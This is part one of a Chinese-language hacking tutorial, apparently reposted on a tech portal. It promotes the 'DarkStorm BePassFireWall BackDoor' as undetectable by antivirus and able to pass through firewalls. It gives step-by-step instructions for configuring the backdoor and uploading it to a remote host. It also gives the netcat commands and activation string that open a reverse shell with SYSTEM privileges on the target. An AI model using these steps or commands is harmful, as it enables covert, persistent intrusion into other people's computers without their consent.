科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道防火墙下的黑马-DBB后门程序(1)

防火墙下的黑马-DBB后门程序(1)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

DarkStorm BePassFireWall BackDoor是一款成功率极高的反弹端口穿透防火墙的后门程序。该后门采用线程插入技术,隐蔽性极高,在系统中以服务形式加载,拥有system权限,一旦运行,很难将其删除。

作者:51CTO.COM 来源:黑基 2007年11月4日

关键字: 注册表 进程 线程插入 后门

  • 评论
  • 分享微博
  • 分享邮件

  今天要为大家介绍的DarkStorm BePassFireWall BackDoor V1.2是一款成功率极高的反弹端口穿透防火墙的后门程序(以下简称DBB),可以穿透99%的防火墙。该后门采用线程插入技术,隐蔽性极高,在系统中以服务形式加载,拥有system权限,一旦运行,很难将其删除。同时,最重要的是,现在还没有杀毒软件能够查杀它,可以说是现在理想的后门程序了。下面就让我们一起来领略一下DBB的独到魅力吧!

  一、配置后门

  第一步当然是把三、轻松操纵当回家,在使用后门前,请先用压缩包内的config DarkStorm.exe程序配置后门。双击运行config DarkStorm.exe,打开如图1所示的配置对话窗口,根据提示输入相关数据。其实,该后门支持不经过配置就可直接使用,这时将使用后门的默认配置:反向连接端口是8888,关键字是NOIR,服务名是DNScnsvc。

  

  

  小提示:DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成,这两个exe和DLL文件是可以改名的,但是必须要改成同样的名字,比如,可以把exe文件改名为123.exe,那么dll文件也要相应的改名为123.dll。

  二、打开后门

  要运行后门很简单,只要将exe和dll文件上传到远程主机上之后,直接运行exe文件,后门即可被加载。

  小提示:exe文件和dll文件不必一定要放到system32中,但必须在同一文件夹下。

  大家都知道,现在很多情况下主机是在防火墙后面的,如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的,仅支持nc反向连接。

  首先在本地计算机中使用nc监听本地计算机的8888端口,进入命令行状态,运行如下命令: nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....),接着再开一个命令行窗口,运行命令:nc 220.202.242.101 139,然后输入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址,NOIR为反弹激活字,220.202.242.98:8888为反向连接的IP地址,也就是本机IP地址及端口。如果反向连接成功,就会在本地计算机中得到目标主机的一个系统权限SHELL(如图2)。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章